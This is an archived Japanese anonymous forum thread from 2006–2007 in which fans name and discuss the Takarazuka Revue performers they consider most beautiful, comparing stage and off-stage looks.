476 :名無しさん@花束いっぱい。:2006/12/27(水) 18:26:41 ID:uCg3Vl5j
明日海りお。
檀ちゃんに似てる。

477 :名無しさん@花束いっぱい。:2006/12/27(水) 18:38:04 ID:tRDTbNow
自分も望海風斗は綺麗だと思う
男役の色気はまだまだ無く、派手な美人では無いけど
しゅっとした涼しげな美人だ

478 :名無しさん@花束いっぱい。:2006/12/27(水) 20:00:46 ID:cP+aLUqp
とーやん、綺麗だと思う

479 :名無しさん@花束いっぱい。:2006/12/27(水) 23:50:11 ID:GfCkvvYR
とーやんは美人だよね
私ははっきりした顔立ちが好きだからかな

480 :名無しさん@花束いっぱい。:2006/12/27(水) 23:59:39 ID:KiqGYG4H
早霧せいなの目元が大好き
ちと色素薄い感じが好き

481 :名無しさん@花束いっぱい。:2006/12/28(木) 00:16:32 ID:dU2VWO+L
檀れいさんほど美しい方はいないと思います。

482 :名無しさん@花束いっぱい。:2006/12/28(木) 00:24:48 ID:A7FaMRy5
檀ちゃんは歌ったり踊ったりしなければ・・ね。

483 :名無しさん@花束いっぱい。:2006/12/28(木) 11:11:52 ID:KdWVgumm
かし

484 :名無しさん@花束いっぱい。:2006/12/28(木) 13:47:30 ID:YPUohHiS
月クロニクル見た
理事のあまりの彫刻ぶりに思わず笑いがw
新公のマギーより外人に見えた
美人より美形?と思ったけどトークショーを見ると美人だった

新公のマサキは色っぽさのある美人だった
オフメイクのときも綺麗だった
オクラホマのリュウ様は捨て置けない美人さんだった

485 :名無しさん@花束いっぱい。:2006/12/28(木) 17:04:37 ID:coblNj3r
トークショーの理事見て女らしいーと思った!美人でした!本気で女やると最強な気がする

486 :瑠利:2006/12/28(木) 17:57:41 ID:Yb7yEzy9
かしちゃんが一番綺麗!!!!!!!!!!!!!!!!!!!!!!!!

487 :名無しさん@花束いっぱい。:2006/12/28(木) 18:05:30 ID:hgbOSDQP
理事は確かに美人だけど、顔よりも体美人じゃね?
オクラホマ稽古映像であまりのカッコイイボディに仰け反っちまった
ドレスでも脱いでもいけてるのにもったいないことよ

OGのほさち、あやか、あゆが好みの美人
今こういう華やかな美人娘役が非常に少ない気がする

488 :名無しさん@花束いっぱい。:2006/12/28(木) 18:13:29 ID:VuIIT6+w
あやね、となみ、かなみ、うめ、あすか
見事に全然名前が出てこない

489 :名無しさん@花束いっぱい。:2006/12/28(木) 18:19:04 ID:6bcOmHBF
オクラホマのリュウ様はすごい美人さんだった。男役の時はクドいのに。

490 :名無しさん@花束いっぱい。:2006/12/28(木) 20:00:37 ID:U0oJtPwL
男役 コム、カシ。
娘役 みほこ。

491 :名無しさん@花束いっぱい。:2006/12/28(木) 20:46:10 ID:PaDKe2hA
理事は化粧してても落としてもキレイだと思った。この人女役とかやってないの?

あと、ゆうひは化粧してる時相当素敵だと思ったけど落とした顔見て目がちっちゃくてびっくりした。

492 :名無しさん@花束いっぱい。:2006/12/28(木) 21:25:16 ID:JuK7a1B4
みほこは100歩ゆずっても、コムはないだろ、スレ違い。

493 :名無しさん@花束いっぱい。:2006/12/28(木) 22:07:37 ID:/mzXuUqP
コムちゃん、バックに天使の羽かなんかが
舞ったようなポスカのは、すごい可愛いと思う。
写りによるんだよ。
私は、かしちゃんの顔が好き。変な表現だけど
暖かい美人なの、笑顔が穏やかなんだよね。


494 :名無しさん@花束いっぱい。:2006/12/28(木) 22:08:02 ID:zmQje7dI
みほこは可愛い顔している
ねねも可愛い
理事は確かに体美人でもあるw

495 :名無しさん@花束いっぱい。:2006/12/29(金) 01:35:02 ID:pFktdhHY
コム
あんなに頭の小さい大人、みたことない。

496 :名無しさん@花束いっぱい。:2006/12/29(金) 02:37:50 ID:xXinWQVq
つ 鳥女さん

497 :名無しさん@花束いっぱい。:2006/12/29(金) 07:09:49 ID:J+0uxlrK
あさじさき

498 :名無しさん@花束いっぱい。:2006/12/29(金) 13:11:31 ID:80rwo4RF
ともよ

499 :名無しさん@花束いっぱい。:2006/12/29(金) 14:58:14 ID:RrvgCDkk
>>495
いくらでも居る
ってかスレチ。
美人といえばかしげ・檀

500 :名無しさん@花束いっぱい。:2006/12/29(金) 16:29:40 ID:hgbu7x3x
やっぱ檀ちゃん、最強
特にショーの時の強めにキメてる顔が好き
男役に自分から誘いかけるような時の横顔とか

501 :名無しさん@花束いっぱい。:2006/12/29(金) 19:55:53 ID:rCikHp2B
最強コンビかしちゃん、檀ちゃん
共通点は黒目がちの目

退団後、あの二人が並んでる姿をブラウン管で
見てみたい。

502 :名無しさん@花束いっぱい。:2006/12/29(金) 20:27:00 ID:GbrBeVlW
カシゲって同期では檀ちゃんが仲良しだったのかな?PB1で2ショ写真が2個あった

503 :名無しさん@花束いっぱい。:2007/01/01(月) 01:35:16 ID:vHNg3Bzv
おめでとう!
新春メッセージ、となみちゃんがとっても綺麗だった
かしタンはテカテカした綺麗さがあった
理事タンは大人の魅力っつうか危ない綺麗さあった
あとおさちゃんの目が可愛かった

504 :名無しさん@花束いっぱい。:2007/01/01(月) 01:51:50 ID:+7fKe7bz
壇ちゃん映画で見直した
宝塚現役時代は自分のご贔屓のほうが可愛い(美人)し
素敵だもんねって思ってたけど…映画はヨカタ

505 :名無しさん@花束いっぱい。:2007/01/01(月) 01:52:24 ID:/uWyt7Lu
浅茅が宿
新公コンビが最強の美人コンビ

506 :恵子:2007/01/01(月) 10:15:59 ID:y+U2/ZDi
わかりません

507 : 【吉】 【318円】 :2007/01/01(月) 10:43:34 ID:d2HefhC0
ともよ

508 : 【豚】 【1456円】 :2007/01/01(月) 13:14:07 ID:qaW59cS3
きんさん

509 :名無しさん@花束いっぱい。:2007/01/01(月) 17:43:56 ID:fz6+szm2
檀れいさん・綺華れいさん
星組最強

510 :omikuji:2007/01/01(月) 18:08:00 ID:3Qn2jw1y
貴城けい
眉月凰
早霧せいな
望海風斗

511 : 【中吉】 【16円】 :2007/01/01(月) 22:52:50 ID:j6Bjt72o
スレ違いとブーイング来そうだけど、春野寿美礼。
ただし、今じゃなくてトップ就任前後限定w
不滅の棘の頃とか、超小顔&華奢&真っ白肌のクールビューティで憧れた。

それに、大空祐飛。
クールビューティ&童顔の個性的な顔立ちがすごく美しくて目を惹く。
この人は、いつまでも老けずに綺麗なお姉さんだと思う。

512 :名無しさん@花束いっぱい。:2007/01/01(月) 23:37:26 ID:P1Cmu3G+
マニアックなとこで花組かりやん。
ただしエリザ黒天使辺り〜
入団前にホクロ取ればよかったのに…
出で素顔見てこの人って美人なんだと
舞台は表情がなんとも不細工なんだが

513 :名無しさん@花束いっぱい。:2007/01/02(火) 02:21:20 ID:VOXkQRoZ
小顔で白けりゃ、七難かくすか。

514 :名無しさん@花束いっぱい。:2007/01/05(金) 21:40:07 ID:GjLTAyPx
カリヤン…ホントにマニアックだな

515 :名無しさん@花束いっぱい。:2007/01/05(金) 23:01:58 ID:bfd7ea0a
こちらもマニアックですが、
朝風れいさんはどうですかね?
結構整ったあっさり系美人だと思うのですが。

516 :名無しさん@花束いっぱい。:2007/01/05(金) 23:55:11 ID:J2092wVX
凰稀かなめ
鳳翔大
あんま好きじゃないが美人だとオモ。

517 :名無しさん@花束いっぱい。:2007/01/06(土) 19:29:50 ID:PbKEQVL6
大和悠河

518 :名無しさん@花束いっぱい。:2007/01/06(土) 19:42:31 ID:ux3Y69Z1
七帆ひかるさんが綺麗!
ただし、舞台化粧のみ。

519 :名無しさん@花束いっぱい。:2007/01/06(土) 19:56:20 ID:ojW9Wb8l
>>515
思った〜
あんまり目立ってないけどスッキリした美人だよね

520 :名無しさん@花束いっぱい。:2007/01/06(土) 21:37:41 ID:uMcSDIkz
貴城けい 彩乃かなみ 檀れい 安蘭けい

521 :名無しさん@花束いっぱい。:2007/01/06(土) 22:14:20 ID:6bDY6hw2
剣崎裕歌。これからの成長に期待。

522 :名無しさん@花束いっぱい。:2007/01/07(日) 08:35:04 ID:tIM1yzTw
真飛聖・壮一帆・大和悠河…
華耀きらり・純花まりい・花影アリス…

(*´∀`)<う・美しい…美し過ぎる…罪なくらいだ!

523 :名無しさん@花束いっぱい。:2007/01/07(日) 19:52:32 ID:ZPVoTMRz
うーん やはり 大和悠河 だな!

524 :名無しさん@花束いっぱい。:2007/01/07(日) 23:01:26 ID:5IVaBhHz
花總まり。1日のNHKBSに出ていたハナは最高に可愛かった。

525 :名無しさん@花束いっぱい。:2007/01/07(日) 23:35:42 ID:eFAKdjk2
口を閉じてるときのとうこさん。


526 :名無しさん@花束いっぱい。:2007/01/08(月) 00:00:17 ID:0rk6enN/
轟 悠
日本人のどのDNAを受け継いであの顔ができるのか不思議だ…。
ノバボサノバの時とか危うくホレそうになったよ(笑)

527 :名無しさん@花束いっぱい。:2007/01/08(月) 04:28:56 ID:+OeMiCUZ
早霧せいなは若手では一番美形

528 :名無しさん@花束いっぱい。:2007/01/08(月) 10:35:16 ID:TVDn+Cli
>526
理事は2階席から見るとまんま彫刻
他の人はわぁ綺麗と普通に思うんだけど、
理事の場合、綺麗とかいう以前に
なんでこんな顔の人がいるんだろうと思ってしまう

529 :名無しさん@花束いっぱい。:2007/01/08(月) 12:14:58 ID:fD/S0xNJ
>528 
初観劇の時、理事は「綺麗なんだけれど顔がでかい!」と思った。
なぜかなぁ〜?と思ったら後でわかった。
コムさんが隣にいたからだった(笑)

530 :名無しさん@花束いっぱい。:2007/01/08(月) 13:17:02 ID:IoAnDTZK
理事、貴城けい、安蘭けい、壮一帆、早霧せいな、真飛聖、アリスちゃん

531 :名無しさん@花束いっぱい。:2007/01/08(月) 13:32:18 ID:89jZAyGq
理事はヅカメイクでもオフメイクでも映える顔立ち
檀ちゃんもオンオフどっちも綺麗だった
加えて劇団の愛もひとしお・・・
昔の宝塚を知っている人の話だと
もう研一、二の頃から目立っていたらしい
第二の理事檀が出てこないかなあ

532 :名無しさん@花束いっぱい。:2007/01/08(月) 18:10:57 ID:Z1g2xIbK
となみちゃん綺麗になったね

533 :名無しさん@花束いっぱい。:2007/01/08(月) 22:12:57 ID:znM9l5u6
檀れい・早霧せいな(文句なしの正統派美人)
轟悠・綺華れい(クールな彫刻系のモデル美形)
白羽ゆり・彩乃かなみ・花影アリス(異性ウケする可愛い美人)
貴城けい(キラキラな粉ふりまき笑顔美人)


534 :名無しさん@花束いっぱい。:2007/01/08(月) 22:56:50 ID:tMY5etXg
彩輝なお

535 :名無しさん@花束いっぱい。:2007/01/08(月) 23:25:16 ID:1Pro6cVR
かしげがコンビニでお菓子買ってた。
スッピンなのに綺麗すぎてたまげた。

536 :名無しさん@花束いっぱい。:2007/01/09(火) 11:07:49 ID:yThlbp6Q
>535
最近のお話ですか?いいなぁ。
私もかしちゃんが美人さんだと思う。NOWONとかのふとした表情でも美形なのはポイント高!
ただ今はやつれが激しくて…、ちょっと心配。

537 :名無しさん@花束いっぱい。:2007/01/09(火) 18:02:53 ID:lcVA0fsb
榎登也

538 :名無しさん@花束いっぱい。:2007/01/09(火) 19:49:19 ID:PUuZTR7a
かしげちゃん。美人すぎる!!!

539 :名無しさん@花束いっぱい。:2007/01/09(火) 23:11:12 ID:MEq5dzMy
バウの出でゆかりを見たけど目の覚めるような美人でびっくら!

540 :名無しさん@花束いっぱい。:2007/01/10(水) 10:16:02 ID:kUwkdaHu
ゆかり、気合い入ってる時はビックリする位綺麗だけど
気合いが入ってない時はちょっと失望する。

541 :名無しさん@花束いっぱい。:2007/01/10(水) 12:09:27 ID:CMBGq0PI
ゆかりは朝すっぴんのうえに眠りながらオサレにして来るからねw
高低差の激しさがオモロ、起きてれば素顔でも綺麗だとオモ


542 :名無しさん@花束いっぱい。:2007/01/10(水) 16:11:03 ID:jWl5rKCg
轟さん 物腰がとても上品で色気もあって美しいとおもいます!

543 :名無しさん@花束いっぱい。:2007/01/10(水) 17:31:48 ID:Uxo0UV1s
綺麗と漢字でかけるのは 轟悠さん!
本物見て息が詰まったのはこの人!!

93 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)